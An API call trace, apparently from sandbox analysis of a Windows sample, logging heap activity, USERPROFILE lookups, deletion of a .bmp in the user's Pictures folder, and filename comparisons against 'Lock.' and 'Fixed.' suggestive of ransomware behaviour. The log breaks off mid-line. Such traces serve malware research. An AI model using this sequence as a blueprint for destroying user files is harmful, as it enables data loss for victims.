1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0254.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a4048 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.691] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0254.692] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.692] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0254.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0254.694] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/70BY_GgaY1.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\70BY_GgaY1.bmp", lpFilePart=0x8bedfc*="70BY_GgaY1.bmp") returned 0x35 [0254.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0254.694] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\70BY_GgaY1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\70by_ggay1.bmp")) returned 0x20 [0254.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\70BY_GgaY1.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3db00, ftCreationTime.dwHighDateTime=0x1d4ca4a, ftLastAccessTime.dwLowDateTime=0xe8dbd680, ftLastAccessTime.dwHighDateTime=0x1d4cd31, ftLastWriteTime.dwLowDateTime=0xe8dbd680, ftLastWriteTime.dwHighDateTime=0x1d4cd31, nFileSizeHigh=0x0, nFileSizeLow=0x4c04, dwReserved0=0x14df, dwReserved1=0x4, cFileName="70BY_GgaY1.bmp", cAlternateFileName="70BY_G~1.BMP")) returned 0xaa5760 [0254.694] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\70BY_GgaY1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\70by_ggay1.bmp")) returned 1 [0254.695] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef3db00, ftCreationTime.dwHighDateTime=0x1d4ca4a, ftLastAccessTime.dwLowDateTime=0xe8dbd680, ftLastAccessTime.dwHighDateTime=0x1d4cd31, ftLastWriteTime.dwLowDateTime=0xe8dbd680, ftLastWriteTime.dwHighDateTime=0x1d4cd31, nFileSizeHigh=0x0, nFileSizeLow=0x4c04, dwReserved0=0x14df, dwReserved1=0x4, cFileName="70BY_GgaY1.bmp", cAlternateFileName="70BY_G~1.BMP")) returned 0 [0254.695] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0254.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.696] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0254.697] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.697] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0254.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0254.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/70BY_GgaY1.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\70BY_GgaY1.bmp", lpFilePart=0x8bf658*="70BY_GgaY1.bmp") returned 0x35 [0254.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0254.699] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\70BY_GgaY1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\70by_ggay1.bmp")) returned 0xffffffff [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.700] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0254.700] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.700] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0254.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0254.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.701] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0254.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.702] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0254.702] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0254.702] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.702] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0254.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 